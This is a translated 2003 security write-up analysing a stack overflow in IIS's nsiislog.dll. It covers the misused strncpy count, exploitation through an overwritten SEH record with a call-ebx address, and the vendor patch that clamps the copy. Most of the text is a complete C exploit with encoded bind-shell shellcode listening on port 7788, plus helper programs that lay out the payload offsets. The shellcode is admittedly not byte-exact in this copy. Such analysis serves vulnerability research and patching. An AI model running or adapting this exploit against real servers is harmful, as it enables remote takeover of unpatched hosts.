[Practical] Analysis of the nsiislog.dll overflow

Analysis of the overflow in IIS's nsiislog.dll (the Windows Media Services logging ISAPI extension)

Created: 2003-07-02   Updated: 2003-07-02

Article type: original

Submitted by:

Flashsky (Flashsky1_at_sina.com)

Reprinting: please credit the author and Xfocus (Security Focus)

Author: FLASHSKY

Sites:

www.xfocus.net

www.shopsky.com

Email: Flashsky@xfocus.org

Affiliation: Qiming Xingchen (Venustech) Active Defense Laboratory

Just writing a throwaway article to earn some points; please don't throw eggs at me.

Root cause of the overflow:

The code that causes the overflow is in nsiislog.dll, as follows:

.text:40F01B08 mov     ecx, esi
.text:40F01B0A call    dword ptr [eax+8]
.text:40F01B0D push    eax                 ; <-- the computed POST data length
.text:40F01B0E mov     ecx, ebx
.text:40F01B10 push    [ebp+arg_4]         ; <-- the POST data buffer
.text:40F01B13 call    sub_40F01EEE

################

Contents of sub_40F01EEE:

.text:40F01EEE push    ebp
.text:40F01EEF mov     ebp, esp
.text:40F01EF1 mov     eax, 1104h
.text:40F01EF6 call    sub_40F02B80        ; <-- allocates the buffer: adjusts esp by 0x1104 (__chkstk-style stack probe)
.text:40F01EFB push    ebx
.text:40F01EFC push    esi
.text:40F01EFD mov     ebx, [ebp+arg_4]    ; <-- the parameter that causes the overflow: this should be the length of the destination buffer, but the caller passes the POST data length
.text:40F01F00 push    edi
.text:40F01F01 mov     edi, [ebp+arg_8]    ; arg_8 is another string; the repne scasb below computes its length into var_4
.text:40F01F04 or      ecx, 0FFFFFFFFh
.text:40F01F07 xor     eax, eax
.text:40F01F09 push    ebx                 ; strncpy count = POST data length
.text:40F01F0A repne scasb
.text:40F01F0C push    [ebp+arg_0]         ; <-- strncpy source: our POST data
.text:40F01F0F lea     eax, [ebp+var_1104]
.text:40F01F15 not     ecx
.text:40F01F17 dec     ecx
.text:40F01F18 push    eax                 ; <-- strncpy destination: the 0x1104-byte stack buffer that gets overflowed
.text:40F01F19 mov     [ebp+var_4], ecx
.text:40F01F1C call    ds:strncpy          ; <-- strncpy(buf, post_data, post_len): this is the overflow

################

Why it overflows:

strncpy is meant to be a safe call; its intended usage is:

strncpy(buf1, buf2, buf1maxlen)

In this call, however, the caller has misunderstood the function and uses it as:

strncpy(buf1, buf2, buf2len)

The third parameter, which should be the size of the destination buf1 so that it bounds the copy, is instead the attacker-controlled length of the source, so the copy runs straight past the destination and the overflow follows.

From this we can compute where the return address lies in the overflow: 0x1104 (buffer) + 4 (saved EBP) = 0x1108, so the return address occupies bytes 0x1108..0x110B and data from 0x110C onward lands above the return address. Note that the POST data used for the overwrite must not contain a 0x00 byte: strncpy stops copying at the first NUL and fills the remainder of the count with zeros.

Implementing the overflow attack:

However, before sub_40F01EEE returns, later code repeatedly raises exceptions (mainly in a subsequent strspn call), so instead of the return address we have to overwrite the exception registration record. (With carefully designed content one could avoid raising an exception at all, but that is far too much trouble.) nsiislog.dll registers no exception handler of its own, so we overwrite the default exception registration record; by adding up the sizes of all the stack frames in the call chain, the distance from the start of our overflowed buffer to the handler pointer in that record works out to 0x2708.

Another thing to consider: if the application does some work before the exception is raised, it is best to have the exception occur inside strncpy itself. (In this overflow, the code that runs after the copy transforms some of the data below EBP and also truncates part of the appended string; the shellcode could be placed so as to avoid that, but then the return address is not easy to set.)

So we need a POST body longer than 0x270C that also causes an access violation inside strncpy. The length required depends on where the current buffer sits relative to the next unmapped region (for example, a buffer at 0x8cxxxx faults when the copy reaches 0x8D0000):

Taking this into account, we send 0x10000 bytes of data (typically about 25,000 bytes already fault inside strncpy), which guarantees that the exception happens in strncpy.

Next we need the address of a call ebx or jmp ebx (because we are overwriting the exception registration record). nsiislog.dll contains many of these, which removes most of the dependence on the target's version. Here is why it is a call (jmp) ebx we want after overwriting the exception record.

First, the exception registration record is laid out as follows:

DWORD pNext      pointer to the next exception registration record
DWORD funAddr    entry address of the current handler

The relevant processing in KiUserExceptionDispatcher (as seen in the debugger) is:

77F8E4CA FF7304        push dword ptr [ebx+4]    ds:0023:008cf764=40F0135C   <-- [ebx+4] is the handler about to be called; ebx holds the address of the registration record itself. Because the dispatcher may still need to walk to the next record, ebx is not modified, so after we overwrite the handler at [ebx+4], ebx points into memory we control.
77F8E4CD 8D45F0        lea  eax, [ebp-0x10]
77F8E4D0 50            push eax
77F8E4D1 FF750C        push dword ptr [ebp+0xC]
77F8E4D4 53            push ebx
77F8E4D5 56            push esi
77F8E4D6 E83AFFFFFF    call ntdll!RtlSetBits+0x305 (77F8E415)

################

77F8E42F FF7514        push dword ptr [ebp+0x14]
77F8E432 FF7510        push dword ptr [ebp+0x10]
77F8E435 FF750C        push dword ptr [ebp+0xC]
77F8E438 FF7508        push dword ptr [ebp+0x8]
77F8E43B 8B4D18        mov  ecx, [ebp+0x18]      <-- the handler address taken from the overwritten record
77F8E43E FFD1          call ecx                  {nsiislog+0x135c (40F0135C)}

################

Note that the return address we located (the call ebx) is stored at [ebx+4], and call ebx then executes the contents of the record itself as instructions. The four bytes of pNext (at ebx, just before the handler pointer at ebx+4) must therefore be code that skips over the handler pointer into the shellcode. The exploit is below; it uses ISNO's shellcode (the copy I had was slightly defective: the shell came up but no command could be entered, so I modified it). After it runs, telnet to the target IP on port 7788.

################

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>

char *hostname = NULL;

/* ISNO's bind-shell shellcode (listens on port 7788), XOR-encoded with 0x97.
   Several lines are short of 16 bytes in this copy of the article, so the
   string below is not byte-exact. */
unsigned char shellcode[] =
"\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90"
"\x90\x8b\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xfa"
"\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36"
"\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97"
"\x97\x77\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14"
"\x59\x96\x97\x97\x16\x96\x97\x97\x96\x97\xc1\x16\xac\xda\xcd\xe2"
"\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14"
"\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5"
"\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1"
"\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16"
"\xee\x93\xe5\xee\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68"
"\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1"
"\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94"
"\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4"
"\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68"
"\x85\xcd\x1a\xd5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57"
"\x3b\x13\x57\x5e\x1d\x99\x13\x5e\x93\x9e\xc5\xc1\xc4"
"\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4"
"\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5"
"\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68"
"\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67"
"\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1"
"\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf"
"\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab"
"\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0"
"\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4"
"\x57\xc7\x68\xc0\x5f\x68\xc0\x5b\x68\xe1\x6b\x68\xc0"
"\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56"
"\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7"
"\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
"\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4"
"\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f"
/* The next line is where the defective shellcode was modified. The original bytes were
   \xc0\x6b\xa4\x5e\xc6\xc7, which swapped the last two parameters of WriteFile,
   so the write to the pipe failed and no command could be entered.
       Original:                      Modified:
       push edi  (an address)         xor ecx, ecx
       xor ecx, ecx                   push ecx
       push ecx                       push edi
       push eax  (bytes received)     push eax
       push esi  (buffer pointer)     push esi
       push [edx-54]                  push [edx-54]
       call WriteFile                 call WriteFile
   With the original order, lpOverlapped is an address and lpNumberOfBytesWritten is
   NULL, so the write to the pipe fails. */
"\xa4\x57\xc7\xc1\xc4\x68\xc0\x6b\xa4\x5e\xc6\xc0\xc7"
"\xc1\x68\xc0\x3b\x68\xc0\x4f\xfd\xc7\x7c\x3d\xc7\x68"
"\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f"
"\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75"
"\x6a\x68\x68\x7f\x05\xdc\xc1\x70" /* one byte here is unrecoverable in this copy */ "\xb4\x17\x70\xe0"
"\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5"
"\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2"
"\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6"
"\x97\xd4\xe5\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97"
"\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc"
"\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb"
"\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97"
"\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2"
"\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4"
"\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97"
"\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2"
"\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97"
"\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97"
"\x68\x68\x68\x68";

int main(int argc, char **argv)
{
    WSADATA wsadata;
    SOCKET s;
    struct sockaddr_in addr_in;
    unsigned char buf[1000];
    unsigned char testbuf[0x10000];
    int len;
    char t1[] = "POST /scripts/nsiislog.dll HTTP/1.1\r\nHost: 192.168.10.210\r\nContent-Length: 65536\r\n\r\n"; // 4364

    if (argc < 2)
    {
        printf("usage: %s <target ip>\n", argv[0]);
        return 1;
    }

    if (WSAStartup(MAKEWORD(2, 0), &wsadata) != 0)
    {
        printf("WSAStartup error. Error: %d\n", WSAGetLastError());
        return 1;
    }

    hostname = argv[1];
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(80);
    addr_in.sin_addr.s_un.s_addr = inet_addr(hostname);

    memset(testbuf, 0, 0x10000);

    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
    {
        printf("socket failed. Error: %d\n", WSAGetLastError());
        return 1;
    }

    if (WSAConnect(s, (struct sockaddr *)&addr_in, sizeof(addr_in), NULL, NULL, NULL, NULL) == SOCKET_ERROR)
    {
        printf("connect failed. Error: %d\n", WSAGetLastError());
        return 1;
    }

    /* request line and headers first, then the 64 KB body */
    len = sizeof(t1) - 1;
    memcpy(testbuf, t1, len);
    send(s, (char *)testbuf, len, 0);
    recv(s, (char *)buf, 1000, 0);

    memset(testbuf, 'A', 65536); // 4364
    len = 65536;                 // 4364;
    *(DWORD *)(testbuf + 0x2704) = 0x04eb06eb; // pNext: "jmp short +6 / jmp short +4", skips over the handler pointer into the shellcode
    *(DWORD *)(testbuf + 0x2708) = 0x40f0135c; // handler: address of a call ebx inside nsiislog.dll
    memcpy(testbuf + 0x270c, shellcode, sizeof(shellcode));
    send(s, (char *)testbuf, len, 0);

    closesocket(s);
    WSACleanup();
    return 0;
}

################
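As an added check of the SEH trampoline geometry the exploit above relies on (this is my example, not the author's code and not part of nsiislog.dll): it builds the body with the same offsets (0x2704 pNext, 0x2708 handler, 0x270c shellcode), then simulates what the dispatch described above does when the handler is a call ebx, namely start executing at the record's first byte, and walks the short jumps to confirm where execution actually lands. It also scans for 0x00 bytes up to the end of the shellcode, since strncpy would stop copying there. The three-byte placeholder shellcode is constructed and the helper names are mine; the x86 short-jump encoding (EB rel8, target = end of the instruction + rel8) is standard.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Offsets into the POST body, as measured in the write-up above. */
#define PAYLOAD_LEN     0x10000
#define SEH_NEXT_OFF    0x2704        /* pNext field of the overwritten registration record */
#define SEH_HANDLER_OFF 0x2708        /* handler pointer: a call/jmp ebx inside nsiislog.dll */
#define SHELLCODE_OFF   0x270c
#define CALL_EBX_ADDR   0x40f0135cu
#define TRAMPOLINE      0x04eb06ebu   /* bytes EB 06 EB 04: jmp short +6 / jmp short +4 */

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Lay the body out the way the exploit does: 'A' filler, trampoline in pNext,
 * call-ebx address in the handler slot, shellcode right after the record.
 * Returns the body length, or 0 if the output buffer or shellcode does not fit. */
size_t build_payload(unsigned char *out, size_t out_len, const unsigned char *sc, size_t sc_len)
{
    if (out_len < PAYLOAD_LEN || SHELLCODE_OFF + sc_len > PAYLOAD_LEN)
        return 0;
    memset(out, 'A', PAYLOAD_LEN);
    put_le32(out + SEH_NEXT_OFF, TRAMPOLINE);
    put_le32(out + SEH_HANDLER_OFF, CALL_EBX_ADDR);
    memcpy(out + SHELLCODE_OFF, sc, sc_len);
    return PAYLOAD_LEN;
}

/* Follow the dispatch described above: ntdll calls the handler from [ebx+4] with
 * ebx still pointing at the record; the handler is "call ebx", so execution lands
 * on the record's first byte. Walk any short jumps (EB rel8) from entry_off and
 * return the offset of the first non-jump byte, i.e. where the CPU really ends up. */
size_t seh_landing_offset(const unsigned char *payload, size_t entry_off)
{
    size_t off = entry_off;
    int hops = 0;
    while (payload[off] == 0xEB && hops++ < 4)
        off = (size_t)((long)off + 2 + (int8_t)payload[off + 1]);  /* target = end of insn + rel8 */
    return off;
}

/* strncpy stops at the first NUL and zero-fills the rest of the count, so no byte
 * up to the end of the shellcode may be 0x00. Returns -1 if clean, else the offset. */
long first_nul_before(const unsigned char *payload, size_t end)
{
    for (size_t i = 0; i < end; i++)
        if (payload[i] == 0x00)
            return (long)i;
    return -1;
}

int main(void)
{
    static unsigned char body[PAYLOAD_LEN];
    /* constructed placeholder, not the real shellcode: nop, nop, int3 */
    const unsigned char sc[] = { 0x90, 0x90, 0xCC };

    build_payload(body, sizeof body, sc, sizeof sc);
    printf("call ebx lands at 0x%zx; entering at pNext+2 lands at 0x%zx\n",
           seh_landing_offset(body, SEH_NEXT_OFF), seh_landing_offset(body, SEH_NEXT_OFF + 2));
    printf("first NUL before end of shellcode: %ld\n",
           first_nul_before(body, SHELLCODE_OFF + sizeof sc));
    return 0;
}
```

Both entry points (the record's first byte and pNext+2) end at 0x270c, which is why the two short jumps are there: whichever byte of pNext execution starts on, it skips the handler pointer and reaches the shellcode. The NUL scan is the check to run before changing the handler address or trampoline for another build of the DLL.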

Patch mechanism:

The patch WindowsMedia41-KB822343-x86-CHS.exe fixes this vulnerability as follows:

.text:40F01FCA mov     eax, 1100h
.text:40F01FCF call    sub_40F02D30            ; reserve 0x1100 bytes of stack for the buffer
.text:40F01FD4 push    ebx
.text:40F01FD5 push    esi
.text:40F01FD6 push    edi
.text:40F01FD7 mov     edi, [ebp+arg_8]
.text:40F01FDA or      ecx, 0FFFFFFFFh
.text:40F01FDD xor     eax, eax
.text:40F01FDF repne scasb
.text:40F01FE1 mov     esi, [ebp+arg_4]        ; esi = requested copy count (the POST data length)
.text:40F01FE4 mov     eax, 0FFFh              ; <-- upper bound 0xFFF (smaller than the 0x1100-byte buffer)
.text:40F01FE9 not     ecx
.text:40F01FEB dec     ecx
.text:40F01FEC cmp     esi, eax                ; <-- is the requested count above the bound?
.text:40F01FEE mov     ebx, ecx
.text:40F01FF0 jbe     short loc_40F01FF4      ; no: keep it
.text:40F01FF2 mov     esi, eax                ; <-- yes: clamp the count to 0xFFF
.text:40F01FF4
.text:40F01FF4 loc_40F01FF4:                   ; CODE XREF: sub_40F01FC7+29j
.text:40F01FF4 push    esi                     ; count, now at most 0xFFF
.text:40F01FF5 lea     eax, [ebp+var_1100]
.text:40F01FFB push    [ebp+arg_0]             ; source: POST data
.text:40F01FFE push    eax                     ; destination: stack buffer
.text:40F01FFF call    ds:strncpy

The count passed to strncpy is now bounded by the destination size rather than the source length, which is exactly the fix the cause analysis called for: with at most 0xFFF bytes written into a 0x1100-byte buffer, the copy can no longer reach the saved EBP or the return address.
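The cause analysis above blames strncpy(buf1, buf2, buf2len), and the patch disassembly shows the fix clamping the count to 0xFFF. The following C program is an added illustration of both (my example, not code from the article or from nsiislog.dll): it models the sub_40F01EEE frame as a flat byte array using the sizes from the disassembly (0x1104-byte buffer, saved EBP at 0x1104, return address at 0x1108), runs the copy with the unpatched count (the source length) and with the patched clamp (0xFFF), and also shows the NUL caveat from the cause analysis: a 0x00 byte in the POST data stops the copy, and strncpy zero-fills the rest of the count, so the return slot is still overwritten, but with zeros. The frame model, the 0x100 bytes of slack after the return address, and the 0xCC fill pattern are my assumptions; the POST body is constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Model of the sub_40F01EEE stack frame from the disassembly: a 0x1104-byte buffer,
 * then the saved EBP, then the return address. FRAME_LEN adds slack so that bytes
 * written past the return address stay inside the model instead of smashing our own stack. */
#define BUF_SIZE   0x1104
#define RET_OFF    (BUF_SIZE + 4)          /* 0x1108: 0x1104 buffer + 4 saved EBP */
#define FRAME_LEN  (RET_OFF + 4 + 0x100)   /* assumed slack, not part of the real frame */
#define PATCH_MAX  0xFFF                   /* clamp applied by the KB822343 version */
#define UNTOUCHED  0xCCCCCCCCu             /* fill pattern: an intact slot reads back as this */

static uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Perform the copy the way nsiislog.dll does and report what ends up in the
 * return-address slot. Unpatched: strncpy(buf, post, post_len), i.e. the count is
 * the SOURCE length. Patched: the count is clamped to 0xFFF first. */
uint32_t ret_after_copy(const unsigned char *post, size_t post_len, int patched)
{
    unsigned char frame[FRAME_LEN];
    size_t count = post_len;

    memset(frame, 0xCC, sizeof frame);
    if (patched && count > PATCH_MAX)
        count = PATCH_MAX;
    if (count > sizeof frame)              /* keep the model itself in bounds */
        count = sizeof frame;
    strncpy((char *)frame, (const char *)post, count);
    return get_le32(frame + RET_OFF);
}

/* Constructed POST body: 'A' filler, "BBBB" where the return address will land,
 * "CCCC" just above it. nul_at >= 0 plants a 0x00 byte at that offset.
 * Returns the body length, or 0 if the output buffer is too small. */
size_t make_post(unsigned char *out, size_t out_len, long nul_at)
{
    size_t n = RET_OFF + 8;                /* 0x1110 bytes: ends 8 bytes past the return slot */
    if (out_len < n)
        return 0;
    memset(out, 'A', n);
    memset(out + RET_OFF, 'B', 4);
    memset(out + RET_OFF + 4, 'C', 4);
    if (nul_at >= 0 && (size_t)nul_at < n)
        out[nul_at] = 0x00;
    return n;
}

int main(void)
{
    static unsigned char post[0x1200];
    size_t n = make_post(post, sizeof post, -1);

    printf("unpatched, no NUL : ret slot = 0x%08x\n", ret_after_copy(post, n, 0));
    printf("patched,   no NUL : ret slot = 0x%08x\n", ret_after_copy(post, n, 1));
    n = make_post(post, sizeof post, 100);
    printf("unpatched, NUL@100: ret slot = 0x%08x\n", ret_after_copy(post, n, 0));
    return 0;
}
```

The unpatched copy returns 0x42424242, the "BBBB" placed at offset 0x1108, while the patched copy leaves the slot at 0xCCCCCCCC because the clamp stops the write 0x109 bytes short of the saved EBP. The third case is the caveat from the cause analysis in code: a single 0x00 byte anywhere before the return slot does not stop the overwrite, it replaces the controlled value with zeros, which is why the request body must be NUL-free all the way to the end of the shellcode.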
